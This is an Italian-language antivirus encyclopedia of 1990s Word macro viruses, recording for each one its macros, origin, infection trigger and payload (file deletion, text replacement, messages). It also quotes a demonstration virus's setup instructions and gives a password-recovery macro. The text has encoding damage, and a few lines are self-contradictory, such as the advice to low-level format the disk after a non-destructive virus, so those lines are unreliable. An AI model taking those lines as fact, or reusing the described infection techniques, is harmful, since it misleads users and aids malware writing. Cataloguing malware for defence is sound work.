Descrizione: La maggior differenza tra questa nuova versione e Concept.G risiede nel non possedere la macro "I8U9YB" (AutoExit nel modello di documento principale). Inoltre, non sostituisce "." (dot) con "," (virgola) il 16 di ogni mese. Concept.J possiede altre procedure. controlla l'ora di sistema cercando un determinato valore nel campo dei giorni. Se Φ presente un 16 (il 16 di ogni mese) attiva le sue procedure. Sostituisce quindi nei documenti infetti le seguenti lettere/parole: "and" con "not" "e" con "a" (Concept.G sostituiva "a" con "e"). [Word_Concept.K:NL (a.k.a. Pheeew)] Nome del virus: Word.Concept.K:NL (a.k.a. Pheeew) Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen, IkWordNietGoed1, IkWordNietGoed2, Lading Lunghezza della Macro: 2759 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: Si Rilevato In The Wild: No Descrizione: Concept.K Φ il primo macro virus di Dutch. Quando viene aperto un documento infetto, Concept.K controlla che ci sia una precedente infezione del modello di documento principale (normal.dot) cercando i nomi delle due macro "Lading" e "BestandOpslaanAls". Se il modello di documento principale non Φ infetto, Concept.K copia le sue macro virali nel modello di documento principale. La macro "IkWordNietGoed2" Φ salvata sotto il nome di "BestandOpslaanAls" ("File/Salva con nome"). Altri documenti divengono infetti quando viene utilizzato il comando "File/Salva con nome". Dopo l'infezione il virus mostra una serie di finestre con il seguente testo: Window 'Important': " Gotcha ! " Window 'FINAL WARNING!': " STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC " Se si preme il tasto "No" sull'ultima finestra, viene attivata una procedura distruttiva. Tutti i file delle directory "C:\" e "C:\DOS" sono cancellati. Questo rende inavviabile il computer. [Word_Concept.L (a.k.a. BlastC)] Nome del virus: Word.Concept.L (a.k.a. BlastC) Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: No Nomi delle Macro: Alignment, AutoOpen, BorderSet, File/Salva con nome, AutoClose, ExitRoutine, BlastCDrive Lunghezza della Macro: 3744 Byte Paese di origine: USA Data di origine: Sconosciuta Payload: Si Rilevato In The Wild: No Descrizione: Concept.L si attiva quando viene aperto un documento infetto (AutoOpen). Altri documenti divengono infetti al momento del loro salvataggio (File/Salva con nome). Concept.L mostra 2 messaggi: All'attivazione: " Welcome to the 'WINWORD.BLAST_C' macro virus... " Dopo l'infezione del modello di documento principale (Normal.dot): " Uh Ohhh. NORMAL.DOT just got infected... " Alla chiusura del documento attivo il 24 di ogni mese, Concept.L farα partire la sua procedura distruttiva. Farα partire il File Manager e cancellerα la directory C:\DELETEME. [Word_Concept.M (a.k.a. New_Horizon)] Nome del virus: Word.Concept.M (a.k.a. New_Horizon) Tipo di Virus: Virus da macro di Word Numero di Macro: 5 Criptato: No Nomi delle Macro: Alignment, AutoOpen, BorderSet, File/Salva con nome, AutoClose, ExitRoutine Lunghezza della Macro: 2432 Byte nei file .doc, 2055 Byte nel modello di documento principale Paese di origine: USA Data di origine: Sconosciuta Distruttivo: No Rilevato In The Wild: No Descrizione: Concept.M si attiva quando viene aperto un documento infetto (AutoOpen). Altri documenti divengono infetti al momento del loro salvataggio con il comando "File/Salva con nome". Questa nuova versione di Concept mostra 2 messaggi: All'attivazione: " Uh Ohhh. NORMAL.DOT just got infected... " All'apertura di un documento infetto: " Welcome to the Winword.New_Horizons macro virus " [Word_Concept.N (a.k.a. Concept.hcr)] Nome del virus: Word.Concept.N (a.k.a. Concept.hcr) Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: File/Salva con nome, XAAZAO, XAAZFS, XayLoad Lunghezza della Macro: 1968 Byte Paese di origine: Sconosciuto Data di origine: Novembre 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Concept.N Φ una nuova versione del virus Concept.A. Tutti i nomi delle sue macro iniziano con la lettera "X" (tranne File/Salva con nome). Perci≥, Concept.N viene classificato come virus, dato che non si replica naturalmente. [Word_Concept.O:Tw] Nome del virus: Word.Concept.O:Tw Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen, Payload, AAAZAO, AAAZFS Lunghezza della Macro: 1968 Byte nei documenti Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: La differenza maggiore tra questa nuova versione e l'originale Concept.A Φ che il virus Concept.O lavora solo con la versione cinese di Microsoft Word. Concept.O infetta il modello di documento principale quando viene aperto un file infetto (AutoOpen). Altri documenti divengono infetti Quando vengono salvati con il comando "File/Salva con nome". Per ulteriori informazioni vedere la descrizione del virus Concept.A. [Word_Concept.Q] Nome del virus: Word.Concept.Q Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen, Payload, AAAZAO, AAAZFS Lunghezza della Macro: 1959 Byte nei documenti, 1652 Byte nel modello di documento principale Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: La differenza tra questa nuova versione ed il virus Concept originale Φ il contenuto della macro "Payload". Concept.Q non contiene il commento "That's enough to prove my point." Concept.Q infetta il modello di documento principale quando viene aperto un documento infetto (AutoOpen). Altri documenti divengono infetti al momento del loro salvataggio con il comando "File/Salva con nome". Per ulteriori informazioni vedere la descrizione del virus Concept.A. [Word_Concept.R (a.k.a Sutra, Diamond)] Nome del virus: Word.Concept.R (a.k.a Sutra, Diamond) Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen (File/Salva con nome), CTFISTCCLLESS11, "CTFBORNIN83" DiamondSutra, File/Salva con nome Lunghezza della Macro: 4069 Byte nei file .doc, 3221 Byte nel modello di documento principale Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: No Rilevato In The Wild: No Descrizione: Questa nuova versione differisce dal virus originale Concept.A solo per poche aggiunte e per il cambiamento di alcuni nomi delle macro. Quando Concept.R infetta il modello di documento principale compaiono diversi messaggi : " SHOSHI-11=TCCL6F200P,in 1983, Japan!!!!! " " SHOSHIisCTFexactly, inYYY with pwd 901109, BUT less 11years " " BUT SEEMS & CHAR === EXACT " " Guy who understand 29 and Prajnaparamita Diamond Sutra " " governors noble truth within the self self self self self so " " CTF=TCCL-11 BUT CTF in 1983 " " CTF's wife is LTC.JAC 24 ; CTF = SUN SUN SUN SUN + 4 CRUELTY " " You will then tell your friends and your friends will tell " " others and other .. other other other other other other !!!!! " " till till till the sun rises in the east which means " " CTF=TCCLby all sense " Quando un documento diviene infetto, Concept.R aggiunge un comando AutoCorrect che sostituisce "teh" con "Shoshi in 1983 is the Sun." questa procedura lavora solamente con la versione di Microsoft Word (Word 7.0) per Windows 95. [Word_Concept.V] Nome del virus: Word.Concept.V Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: No Nomi delle Macro: AutoOpen, MSlothAE, MSlothSA Lunghezza della Macro: 1484 Byte Paese di origine: USA Data di origine: Gennaio 1997 Payload: Si Rilevato In The Wild: No Descrizione: Concept.V Φ una nuova versione che si basa sui virus Concept e Wazzu.H. Include la procedura di Wazzu.H, nella macro "AutoExec" (MSlothAE nei documenti), e la "AutoOpen" ("File/Salva con nome" nel modello di documento principale) di Concept. Anche se questa nuova versione si basa su due differenti virus, Φ in grado di diffondersi ed infettare altri documenti. Per ulteriori informazioni vedere le descrizioni dei virus Wazzu.H e Concept.A. [Word_Concept.Y] Nome del virus: Word.Concept.Y Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AAAZAO, AAAZFS, Payload, AutoOpen Lunghezza della Macro: 1992 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Concept.Y Φ una nuova versione che si basa sul virus Concept.A. La differenza maggiore tra i due virus risiede nella macro "Payload", che possiede la seguente aggiunta nel suo codice della macro: " (For testing only...) " Per ulteriori informazioni vedere la descrizione del virus Concept.A. [Word_Concept.Z] Nome del virus: Word.Concept.Z Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen, AAAAAB, AAAAAC, AAAAAD (AAAAAA, File/Salva, File/Salva con nome, Strumenti/Macro) Lunghezza della Macro: 1774 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: Concept.Z si attiva quando viene aperto un documento infetto (AutoOpen). Altri documenti divengono infetti quando vengono salvati con i comandi "File/Salva" e "File/Salva con nome". Dopo aver infettato il modello di documento principale, Concept.Z entra nel file WINWORD6.INI. Imposta "WW6I=1." Concept.Z cerca di nascondersi attraverso "Strumenti/Macro" (chiamata tecnica macro stealth). Non contiene nessuna procedura distruttiva. [Word_CountTen.A (a.k.a. SaveCount)] Nome del virus: Word.CountTen.A (a.k.a. SaveCount) Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen File/Salva, File/Salva con nome Lunghezza della Macro: 956 Byte Paese di origine: Stati Uniti Data di origine: Dicembre 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: CountTen infetta i documenti un documento infetto viene aperto e salvato con i comandi "File/Salva" e File/Salva con nome". Quando CountTen infetta un file, imposta la variabile "SaveCount." Quando viene salvato un file infetto, questa variabile aumenta. Questa tecnica Φ utilizzata per essere al corrente del numero di volte che un documento infetto Φ stato salvato. Al raggiungimento di 10, CountTen mette la seguente password: " What the hell are you doing? " Questa password Φ troppo lunga per la casella password di Microsoft Word e perci≥ non si pu≥ modificare la password. Per avere accesso al file criptato password, rimuovere la macro virale e creare una macro "AutoOpen" con le seguenti informazioni nel modello di documento principale (NORMAL.DOT): Sub Main ToolsUnprotectDocument.DocumentPassword="What the hell are you doing?" End Sub [Word_Daniel.A (a.k.a Daniel_1F)] Nome del virus: Word.Daniel.A (a.k.a Daniel_1F) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen (Word6Menu), MacroManager Lunghezza della Macro: 2718 Byte Paese di origine: Sconosciuto Data di origine: Settembre 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: Daniel si attiva quando viene aperto un documento infetto (AutoOpen). Rimuovendo l'opzione Tools/Macro, Daniel cerca di rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Daniel ridefinisce il menu File/Save. Al posto della azione originale, girerα MacroManager. Quando viene aperto un file con una estensione non standard (non .doc o .dot), Daniel cambierα le informazioni nel riepilogo di un documento. Alla parola chiave "Daniel_Stone" si pu≥ ritrovare il seguente commento: " All information should be free " [Word_Dark.A (a.k.a. DarkSide)] Nome del virus: Word.Dark.A (a.k.a. DarkSide) Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: AutoClose, DarkSide1, HerramMacro, Strumenti/Macro Lunghezza della Macro: 1304 Byte Paese di origine: Per∙ Data di origine: Sconosciuta Payload: Si Rilevato In The Wild: No Descrizione: Dark infetta il modello di documento principale (normal.dot) quando viene chiuso un documento infetto. Altri documenti si inffettano quando vengono anch'essi chiusi. All'infezione Dark crea il file DARKSIDE.1 nella directory di un file infetto. Il file contiene il seguente messaggio: " ATENCION: esta computadora ha sido infectada!. " " DarkSide1 sin una computadora es como Billy " " The Kid sin un revolver! ! " " ... Virus DarkSide1 creado en la ciudad de Lima en enero de 1997 " " -=] DarkSide1 Is a peruvian virus writer [=- " Per rendere pi∙ difficile l'identificazione di un file infetto, Dark sovrascrive le opzioni Tools/Macro e Herram/Macro con il proprio codice (chiamata tecnica macro stealth). [Word_Date.A (a.k.a. AntiDMV, Infezione)] Nome del virus: Word.Date.A (a.k.a. AntiDMV, Infezione) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1042 Byte Paese di origine: USA Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: Date infetta il modello di documento principale (normal.dot) ogni volta che viene aperto un documento infetto. Altri documenti divengono infetti quando sono aperti. L'infezione si verifica solo fino al giorno 1 giugno 1996. Al momento della lettura di questo documento, Date non dovrebbe pi∙ rappresentare una minaccia anche se i documenti infetti potrebbero essere ancora in circolazione. Date Φ anche conosciuto come AntiDMV. Fu scelto questo nome in quanto rimuove dai documenti la macro "AutoClose". Il virus da macro "DMV," che possiede solo una macro "AutoClose", pu≥ essere rimosso con il virus Date. [Word_Dedicato.A:It] Nome del virus: Word.Dedicato.A:It Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 742 Byte Paese di origine: Italia Data di origine: Aprile 1997 Payload: Si Rilevato In The Wild: No Descrizione: Dedicato infetta il modello di documento principale quando viene chiuso un documento infetto. Altri documenti divengono infetti quando sono anch'essi chiusi (AutoClose). Dedicato utilizza comandi di linguaggio specifici, per questo lavora solo con la versione italiana di Microsoft Word. Nella macro AutoClose si pu≥ ritrovare il seguente commento: " REM Questo MacroVirus e' dedicato alla mia ex-ragazza " " REM Federica, che anche se molti diranno il contrario.. " " REM io ho amato tanto...e ora mi manca... (Gianlu) " Quando Dedicato si attiva (i giorni 8 e 20 di ogni mese), compaiono i seguenti 3 messaggi: " ....MacroVirus Federica in esecuzione.... " " ....Federica Mi Manchi.... " " Master Boot Sector Damaged " [Word_Dietzel.A] Nome del virus: Word.Dietzel.A Tipo di Virus: Virus da macro di Word Numero di Macro: 5 Criptato: Si Nomi delle Macro: DATEISchliessen, EXTRASMakro, DATEIDokVorlagen, DATEISpeichernUnter, DATEIBeenden Lunghezza della Macro: 3987 Byte Paese di origine: Germania Data di origine: Agosto 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'attivazione di Dietzel si verifica quando viene chiuso un documento infetto (DATEISchliessen) o quando si esce da Microsoft Word (DATEIBeenden). Per rendere pi∙ difficile il riconoscimento di un programma infetto, Dietzel sostituisce l'opzione Tools/Macro con una finestra di dialogo molto simile all'originale (chiamata tecnica macro stealth). Mostra la macro solo nel modello di documento principale, ad eccezione delle macro del virus. La routine di Dietzel Φ molto simile a quella dei virus companion tradizionali. Il documento originale rimane intatto, mentre per ogni documento salvato Dietzel crea una copia del modello di documento principale infetto. Questo nuovo file viene collocato nella stessa directory ma con una estensione .BAK. Il documento salvato viene quindi registrato secondo questo nuovo file di modello infetto. Ogni volta che viene chiuso un documento infetto, il file di modello infetto associato sarα caricato come un modello di documento principale. [Word_Divina.A (a.k.a. Roberta)] Nome del virus: Word.Divina.A (a.k.a. Roberta) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 2357 Byte Paese di origine: Italia Data di origine: 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: Divina infetta il modello di documento principale (normal.dot) quando viene aperto o chiuso un documento infetto. Altri documenti divengono infetti quando sono chiusi con il comando "AutoClose". Divina possiede due procedure. La prima procedura controlla l'ora del sistema, e se Φ presente il valore 17 nel campo dei minuti, comparirα una serie di finestre. Alla comparsa di ogni finestra segue una pausa ed un beep. " ROBERTA TI AMO! " " Virus 'ROBERTA' is running. Hard Disk damaged. Start antivirus? " " Exit from system and low level format are recommended. " " Exit from System? " Dopo l'ultimo messaggio Divina cerca di uscire da Windows. La seconda procedura viene attivata il 21 maggio. Divina controllerα nuovamente l'ora del sistema, e se un documento Φ stato chiuso tra i 10 ed i 20 o tra i 40 ed i 50 minuti, compariranno altre 2 finestre. " DIVINA IS THE BEST! " Anche se Divina non contiene nessuna procedure distruttiva, si dovrebbe eseguire una formattazione a basso livello del proprio hard drive. [Word_Divina.B (a.k.a. Roberta)] Nome del virus: Word.Divina.B (a.k.a. Roberta) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 1774 Byte Paese di origine: Italia Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza maggiore tra questa versione ed il virus Divina.A originale, Φ l'assenza della seconda procedura nel virus Divina.B, che si attiva il 21 maggio. Divina.B infetta il modello di documento principale (normal.dot) quando viene aperto o chiuso un documento infetto. Altri documenti divengono infetti quando sono chiusi con il comando "AutoClose". Divina.B possiede una procedura che controlla l'ora del sistema. In caso di un valore di 17 nel campo dei minuti, compare una serie di finestre. Alla comparsa di ogni finestra segue una pausa ed un beep. " ROBERTA TI AMO! " " Hard Disk damaged " " Exit from system and low level format are recommended. " " Exit from System? " Dopo l'ultimo messaggio Divina cerca di uscire da Windows. Anche se Divina .B non contiene nessuna procedura distruttiva, si dovrebbe eseguire una formattazione a basso livello del proprio hard drive. [Word_Divina.C (a.k.a. Roberta)] Nome del virus: Word.Divina.C (a.k.a. Roberta) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 3234 Byte Paese di origine: Italia Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Divina.C Φ una versione riscritta di Divina. Non contiene la seconda procedura, che viene attivata il 21 maggio. Divina.C infetta il modello di documento principale (normal.dot) quando viene aperto e poi chiuso un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose). Divina.C possiede una procedura che controlla l'ora del sistema. In caso di un valore di 17 nel campo dei minuti, compare una serie di finestre. Alla comparsa di ogni finestra segue una pausa ed un beep. Dopo l'ultimo messaggio Divina cerca di uscire da Windows. [Word_Divina.D (a.k.a. Roberta)] Nome del virus: Word.Divina.D (a.k.a. Roberta) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 3234 Byte Paese di origine: Italia Data di origine: 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: La differenza maggiore tra questa versione e Divina.C Φ che il codice Φ stato leggermente cambiato. Divina.D infetta il modello di documento principale (normal.dot) quando viene aperto e poi chiuso un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose). Divina.D possiede una procedura che controlla l'ora del sistema. In caso di un valore di 17 nel campo dei minuti, compare una serie di finestre. Alla comparsa di ogni finestra segue una pausa ed un beep. Dopo l'ultimo messaggio Divina.D cerca di uscire da Windows [Word_Divina.E (a.k.a. Roberta)] Nome del virus: Word.Divina.E (a.k.a. Roberta) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 3295 Byte Paese di origine: Italia Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza maggiore tra questa versione e Divina.C Φ che il codice Φ stato leggermente cambiato. Divina.E contiene 2 linee composte da "*". Divina.E infetta il modello di documento principale (normal.dot) quando un documento infetto viene aperto e poi chiuso. Altri documenti divengono infetti quando sono chiusi (AutoClose). Divina.E possiede una procedura che controlla l'ora del sistema. In caso di un valore di 17 nel campo dei minuti, compare una serie di finestre. Alla comparsa di ogni finestra segue una pausa ed un beep. Dopo l'ultimo messaggio Divina.E cerca di uscire da Windows [Word_Divina.F (a.k.a. Roberta)] Nome del virus: Word.Divina.F (a.k.a. Roberta) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 3234 Byte Paese di origine: Italia Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza maggiore tra questa versione e il precedente virus Divina Φ che il codice Φ stato leggermente cambiato. . Divina.F infetta il modello di documento principale (normal.dot) quando viene aperto e poi chiuso un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose). Per ulteriori informazioni, vedere la descrizione del virus Divina . [Word_DMV.A (a.k.a. Demonstration)] Nome del virus: Word.DMV.A (a.k.a. Demonstration) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoClose Lunghezza della Macro: 3002 Byte Paese di origine: USA Data di origine: Autunno 1994 Distruttivo: No Rilevato In The Wild: No Descrizione: DMV fu il primo virus da macro scritto da Joel McNamara, che pubblic≥ un articolo dettagliato sui virus da macro. Si suppone che DMV abbia dato spunto ad altri autori di virus per scrivere virus da macro di Word. Dato che l'articolo non fu pubblicato prima della scoperta di Concept, gli autori di virus furono spronati ad utilizzare un'altra tecnica. Joel McNamara pubblic≥ inoltre un virus da macro di Excel, che non Φ funzionante (Excel.DMV.A) DMV infetta il modello di documento principale (normal.dot) quando viene chiuso un documento infetto. Altri documenti divengono infetti quando vengono anch'essi chiusi. All'infezione, DMV mostra i seguenti messaggi: " Counting global Macro " " AutoClose macro virus is already installed in NORMAL.DOT. " " Infected NORMAL.DOT with a copy of AutoClose macro virus. " " AutoClose macro virus already present in this document. " " Saved current document as template. " " Infected current document with copy of AutoClose macro virus. " " Macro virus has been spread. Now execute some other code " " (good, bad, or indifferent). " [Word_DMV.B (a.k.a. Waverly)] Nome del virus: Word.DMV.B (a.k.a. Waverly) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoClose Lunghezza della Macro: 1249 Byte Paese di origine: Australia Data di origine: 10\06 Payload: Si Rilevato In The Wild: No Descrizione: DMV.B infetta il modello di documento principale (normal.dot) quando viene chiuso un documento infetto. Altri documenti divengono infetti quando vengono anch'essi chiusi. Se il secondo campo Φ maggiore di 45 ed il mese Φ ottobre o successivo, DMV.B aggiunge il seguente testo alla fine del documento attivo: " We are citizens of Australia. " " We are youth of Victoria. " " We are victims of Mount Waverley Secondary College. " " We tolerated your discipline. " " We stomached your abuse. " " We bore your unprofessionalism. " " We toed the line to protect the bullshit image of YOUR school. " " We watched our friends be pressured out of your school, " " just so you could keep your fucking pass rate figures up. " " And now the world will see, through the spread of this virus " just how TOTALLY FUCKED UP we are! " " Parents: yeah- go ahead send your kids to a school where about half " of us use drugs. You won't see those figures in the glossy brochure." " This community announcement was proudly sponsored by: " " M.W.S.C. Year 12 Class Of '96. - in YOUR face. " [Word_DMV.C] Nome del virus: Word.DMV.C Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoClose Lunghezza della Macro: 2990 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione ed il virus DMV.A originale Φ che alcuni codici del virus sono stati riformattati ed alcune parti sono state perse (indirizzo e-mail). DMV.C infetta il modello di documento principale (normal.dot) quando viene chiuso un documento infetto. Altri documenti divengono infetti quando vengono anch'essi chiusi. Compare il seguente messaggio quando il modello di documento principale Φ stato infettato: " Counting global Macro " " Infected NORMAL.DOT with copy of AutoClose macro virus " " Macro vir. has been spread. Now execute some other code. " Quando un nuovo documento diviene infetto (il modello di documento principale Φ giα infetto), DMV mostra il seguente messaggio: " AutoClose macro vir. is already installed in NORMAL.DOT " " Saved current document as template. " " Infected current .doc with copy of AutoClose macro vir. " " Macro vir. has been spread. Now execute some other code. " Il codice del virus contiene al suo inizio il seguente messaggio: " REM This demonstrates an application-specific document virus " " REM generated by an automatic macro in Microsoft Word for " " REM Windows 6.0. Code is executed each time a document is closed." " REM This macro is only a demonstration, and does not perform any " " REM Distruttivo actions. " " REM The purpose of this code is to reveal a significant security " " REM risk in software that supports macro languages with " " REM auto-loading capabilities. Current virus detection tools are" " REM not presently capable of detecting this type of virus, and " " REM most users are blissfully unaware that threats can come from " " REM documents. " " REM Paste this code in the macro Window of a Word document " " REM template. Save the macro as AutoClose. Enter some random " " REM text in the main word processing window and save the document." " REM Now copy the file, naming the new file VIRUS.DOC. Open " " REM VIRUS.DOC in Word. It will appear as a normal document, but " " REM when you close the document, the virus will execute. " " REM Message boxes display progress as the code is executed. " " REM Code is commented. " " REM Joel McNamara, December 17, 1994 " [Word_Doggie.A] Nome del virus: Word.Doggie.A Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: No Nomi delle Macro: AutoOpen, Doggie, File/Salva con nome Lunghezza della Macro: 610 Byte Paese di origine: USA Data di origine: Estate 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Doggie infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti con il comando "File/Salva con nome". Doggie Φ uno dei pochi virus da macro non distruttivi. Infetta solo altri file e mostra il messaggio: " Doggie " [Word_Drugs.A:De] Nome del virus: Word.Drugs.A:De Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoOpen, Dateidrucken, DateidruckenStandard, DateiSpeichern, DateiSpeichernUnter, DateiSchliessen, DokumentSchliessen, DateiDokVorlagen, ExtrasMakro Lunghezza della Macro: 8013 Byte Paese di origine: Germania Data di origine: Marzo 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: Drugs infetta il modello di documento principale quando viene aperto un documento infetto (AutoOpen). Drugs utilizza comandi di linguaggio specifici, per questo lavora solo con la versione tedesca di Microsoft Word. Usa "ExtrasMakro" e nasconde DokumentVorlagen per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Drugs contiene diverse procedure distruttive. 1. Cancella tutti i file con estensione *.DLL nella seguente directory: C:\WINDOWS\SYSTEM 2. Sostituisce delle parole nei documenti stampati: "und" con "oder" "da▀" con "das" "nΣmlich" con "nΣhmlich" 3. Inserisce interruzioni di pagina. [Word_Dub.A] Nome del virus: Word.Dub.A Tipo di Virus: Virus da macro di Word Numero di Macro: 13 Criptato: Si Nomi delle Macro: AutoExec, NewDocInsert, Strumenti/Macro, FileTemplates, File/Salva con nome, FcDub, AeDub, Annhilator, Message SearchDestroyer, ExeKiller, KillIt (FileClose) Lunghezza della Macro: 22669 Byte nei documenti, 25325 Byte nel modello di documento principale Paese di origine: Baku, Azerbaijan Data di origine: Primavera 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: Quando Dub diventa attivo, cerca nel drive C:\ i documenti (C:\*.DOC). Infetta tutti i documenti che hanno il formato 6/7 di Word. Dopo ogni infezione, Dub scrive un file log dove segna tutti i documenti alterati (il testo esistente Φ sostituito con "666"). Dub.A usa "Strumenti/Macro" e "FileTemplates" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Si consiglia di non accedere ai due suddetti menu, in quanto risulterα in esecuzione il codice virale di Dub. Dub contiene diverse procedure: 1. Quando viene salvato un documento infetto (File/Salva con nome) alle ore 4:00, Dub mostra il seguente messaggio: " Do you believe in Satan? " 2. Quando parte Microsoft Word (AutoExec) il 13 di ogni mese, Dub cerca di cancellare i seguenti file: *.EXE. 3. All'infezione, tutto il testo esistente Φ sostituito con " 666 ". [Word_Dzt.A] Nome del virus: Word.Dzt.A Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen (File/Salva), File/Salva con nome Lunghezza della Macro: 2033 Byte Paese di origine: Indonesia Data di origine: Aprile 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: Dzt.A si attiva quando viene aperto un documento infetto (AutoOpen). Altri documenti divengono infetti quando sono salvati con i comandi "File/Salva" e "File/Salva con nome". Mentre infetta un documento, Dzt.A aggiunge il seguente testo alla sezione Commenti di File|Properties: " DZT " [Word_Dzt.B] Nome del virus: Word.Dzt.B Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen (File/Salva) Lunghezza della Macro: 1214 Byte Paese di origine: Indonesia Data di origine: Aprile 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: Dzt.B si attiva quando viene aperto un documento infetto (AutoOpen). Altri documenti divengono infetti quando sono salvati con il comando "File/Salva". La differenza maggiore tra questa nuova versione e il virus Dzt.A originale Φ che la macro "File/Salva con nome" viene persa. [Word_Dzt.C] Nome del virus: Word.Dzt.C Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: File/Salva con nome Lunghezza della Macro: 819 Byte Paese di origine: Indonesia Data di origine: Aprile 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: La differenza maggiore tra questa nuova versione e il virus Dzt.A originale Φ che la macro "AutoOpen" viene persa. Con molta probabilitα, Dzt.C fu creato da una vecchia versione di un popolare prodotto anti-virus. La routine di disinfezione era difettosa e dimentic≥ di rimuovere la macro "AutoOpen". [Word_Dzt.D] Nome del virus: Word.Dzt.D Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen (File/Salva), File/Salva con nome Lunghezza della Macro: 2584 Byte Paese di origine: Indonesia Data di origine: Aprile 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza maggiore tra questa nuova versione ed il virus Dzt.A originale Φ che il commento nella sezione File|Properties Cambia da "DZT" a "DZT'96." La macro "File/Salva con nome" Φ inoltre parzialmente alterata. Per ulteriori informazioni vedere la descrizione del virus Dzt.A. [Word_Easy.A (a.k.a. EasyMan)] Nome del virus: Word.Easy.A (a.k.a. EasyMan) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1090 Byte Paese di origine: Austria Data di origine: Settembre 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: Easy si attiva quando viene aperto un documento infetto (AutoOpen). Se la macro"AutoOpen" Φ giα presente nel modello di documento principale, Easy non infetta. Il testo seguente verrα inserito all'inizio di un documento aperto ad una data e con un colore scelti a caso: " It's Easy Man " Successivamente Easy mostra il testo seguente nella barra di stato: " Word.EasyMan, written by Spooky " [Word_Epidemic.A] Nome del virus: Word.Epidemic.A Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen, AutoExec Lunghezza della Macro: 38746 Byte Paese di origine: Taiwan Data di origine: Gennaio 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: Quando viene 